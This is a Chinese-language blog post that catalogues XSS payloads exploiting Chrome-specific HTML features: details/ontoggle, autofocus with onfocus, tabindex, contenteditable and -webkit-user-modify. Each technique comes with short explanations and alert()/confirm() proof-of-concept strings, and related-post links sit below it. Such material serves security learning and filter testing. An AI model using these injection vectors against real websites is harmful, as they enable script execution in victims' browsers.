关于谷歌浏览器特性的一些xss payload

已于 2023-06-29 21:22:59 修改
阅读量2k 收藏 3
点赞数
分类专栏: 随笔 文章标签: xss
于 2021-01-24 15:14:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chest_/article/details/113090984
版权
这篇博客探讨了HTML的autofocus属性、tabindex和contenteditable如何结合使用来实现页面焦点控制和交互效果。通过示例展示了如何在Chrome浏览器中利用这些特性创建弹窗、自定义标签的tab切换以及可编辑内容的焦点事件。同时,还提到了`-webkit-user-modify`样式属性,用于控制元素的可编辑性。
摘要由CSDN通过智能技术生成

details 标签

details标签用于描述文档或文档某个部分的细节,目前只有 Chrome 支持 details标签

">'><details/open/οntοggle=confirm(1)>

autofocus属性

说明

autofocus 属性规定当页面加载时标签内元素应该自动获得焦点

onfocus 事件在对象获得焦点时发生

结合起来即可达到弹窗效果

在chrome中autofocus可以与所有HTML标签一起使用,可以利用autofocus属性进行自定义标签

<iframe autofocus onfocus=alert(1)>
<a autofocus onfocus=alert(23) href=#>x</a>

解释:autofocus在页面加载时自动获得焦点,而onfocus 事件在对象获得焦点时发生,所以会产生弹窗。

tabindex

tabIndex 属性可设置或返回单选按钮的 tab 键控制次序,也就是设置了该属性,可以用tab建来回切换标签

<xss tabindex=1 onfocus=alert(1) autofocus>

例如:

<a tabindex=1 onfocus=alert(1) autofocus>1
<a tabindex=2 onfocus=alert(2) autofocus>2
<a tabindex=3 onfocus=alert(3) autofocus>3
<a tabindex=3 onfocus=alert(4) autofocus>4

tab切换标签触发焦点从而弹窗

在这里插入图片描述

contenteditable

contenteditable 属性指定元素内容是否可编辑,当插入contenteditable后,标签页面将变得可以编辑,结合autofocus,聚焦时也可触发弹窗

<a onfocus=alert(1) autofocus contenteditable>111

在这里插入图片描述

user-modify
<x style="-webkit-user-modify:read-write-plaintext-only" onfocus=alert(1) autofocus>
<x style="-webkit-user-modify:read-write" onfocus=alert(1) autofocus>
<x style="-webkit-user-modify:read-write" onfocus=confirm() autofocus>    
confirm()
春日野穹ㅤ
关注
专栏目录
Web安全攻防渗透测试实战指南笔记 三
Ren59421的博客
04-05 8111
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
04 渗透测试基础
weixin_43234021的博客
01-04 1万+
渗透测试基础一 代码审计1 基础环境搭建(1) Web服务:WAMP+phpstudy(2) phpstudy2 HTML 表单 一 代码审计 1 基础环境搭建 (1) Web服务:WAMP+phpstudy (2) phpstudy 启动问题 端口正常开放 80 http 3306 mysql web根目录[C:\Users\dq\Documents\phpStudy-1-24\phpStudy\WWW] php 探针 phpinfo.php phpmyadmin Apache配置文件:[
chrome浏览器开发者模式header请求参数“Request Payload“找不到的问题
m0_67391377的博客
03-08 4942
今天查看接口的时候,发现chrome(谷歌)浏览器开发者工具中,接口请求的参数看不见了,对比一下其他浏览器,还是能看到请求的参数的。查看开发者工具的请求区域,发现了一栏“Payload”,里面有请求的参数。如图所示: ...
ChromeRce:2021年4月15日出现的Chrome payload
04-16
Chrome Rce Payload 文件在payload.html中
谷歌浏览器-network中请求的query string parmeters和request payload的区别
最新发布
随笔
08-21 347
谷歌浏览器-network中请求的query string parmeters和request payload的区别
谷歌浏览器复制post请求中的request payload,如果想生成json数据
质量不太好的博客
11-14 4511
谷歌浏览器复制post请求中的request payload,如果想生成json数据
Chrome 开发者工具新功能-网络面板新增载荷(Payload)边栏
热门推荐
高行行
12-09 1万+
最近开发发现 Chrome 开发者工具里网络请求参数信息被放到了Payload一栏里,感觉可以,查找信息更方便了些 官方新功能介绍文档: https://developer.chrome.com/zh/blog/new-in-devtools-96/ 网络面板新增载荷(Payload)边栏 当您想查看网络请求中的 payload 信息时,可以使用网络面板里面的 Payload 边栏。此前,payload 信息出现在报头边栏里。 Chromium 议题:1214030 ...
如何查看chrome里network的payload
宝安小雨
03-19 1818
如何查看chrome的network的请求payload,点击漏斗形状的过滤器,过滤框清空,表示检测所有,右边按钮点击“全部”,“第三方请求”不要勾选。
payload:浏览器的一个更简单,更小的模块加载器
05-01
有效载荷 浏览器的一个更简单,更小的模块加载器。 不用担心您JavaScript文件包含在其中的顺序。 只需声明每个模块需要哪些依赖关系,并且在加载所有依赖关系后,Payload就会初始化该模块。 还有另一个模块加载器? 是的,我知道。 CommonJS,Require,SystemJS和其他100万个都解决了这个问题。 看,我并不是说您需要使用有效负载。 我只是说有时候流行的解决方案感觉就像用大锤在墙上贴图钉一样。 有效载荷小于2kb(对于IE <9,有效载荷为三分之一),它只有两种简单的方法。 安装 bower install payload 或者: npm install payload --save 然后在模块之前将其包含在HTML中: [removed][removed]
渗透测试学习目录
liupc的学习笔记
05-04 3416
1. 行业术语扫盲 2. 3.
Burp Suite使用介绍总结
h4ck0ne的博客
01-23 5385
Burp Suite使用介绍(一) 小乐天 · 2014/05/01 19:54 Getting Started Burp Suite 是用于攻击web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP 消息,持久性,认证,代理,日志,警报的一个强大的可扩展的框架。本文主要介绍它的以下特点: 1.T
史上最全常见前端大厂面试知识点汇总【已过字节, 腾讯teg,华为,网易】
反手一个bug的博客
05-29 5258
文章目录网络,浏览器篇tcp/ip协议有几层网络七层协议内容浏览器进程和线程进程通信的方式https加密过程url到页面过程http2和http1的区别如何实现有状态的http协议强缓存和协商缓存(浏览器缓存机制)强缓存协商缓存浏览器缓存过程跨域请求js原理篇js执行机制单线程执行宿主执行栈Event Loop宏任务和微任务js为什么设计成单线程语言手写newES6中class是语法还是语法糖原型的终点手写实现promise,promise. all,promise. racepromisepromise.
XSS Payload在浏览器的各种解码问题
m0_63069714的博客
03-07 739
因此,在""和“”的内容中不会创建标签,就不会有脚本能够执行。经过HTML解码后为"",返回的结果是:The javascript will not execute and the character entities will not be decoded either.在 : 前面经过HTML解码后为"javascript",后面经过urlcode解码之后为"alert(2)",返回的结果是:The javascript will execute.
XSS Payload 学习浏览器解码
m0_61579490的博客
07-26 331
XSS Payload 学习浏览器解码
Chrome浏览器开发者工具中header的请求参数‘Request Payload‘ 和 ‘Query String Parameters‘ 消失不见
qq_45060674的博客
09-11 5924
chrome浏览器开发者工具中的**接口请求参数不见了**(Form Data)。上网搜索了很久,最后发现请求参数其实是在Payload
关于浏览器Ajax请求Type为Request Payload而不是Form Data
chuque4897的博客
01-02 353
排查了许久。最后得出来是JqGrid插件的问题 没办法,底层不能改 在你Ajax请求中加上 headers : { 'Content-Type' : 'application/x-www-form-urlencoded' }, 示例: $.ajax({...
XSS Payload 学习浏览器解析机制
weixin_59280309的博客
07-25 1261
浏览器解析机制遵循规则;XSS Payload举例:
为什么chrome没有paylod
yilu_beiyu的博客
03-02 4800
引用自: Unable to see Request Payload in Chrome Network tab - Super User if your form set enctype="multipart/form-data", then Chrome will not catch the request payload. <form action="" method="POST" enctype="multipart/form-data"> </form> ...
xss payload
09-30
XSS(跨站脚本攻击) Payload是一种攻击技术,通过在网页中插入恶意代码来窃取用户信息或者对用户进行攻击。以下是几个XSS Payload的例子: 1. `<script>alert('XSS')</script>`:这个Payload会在页面加载时执行一个...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值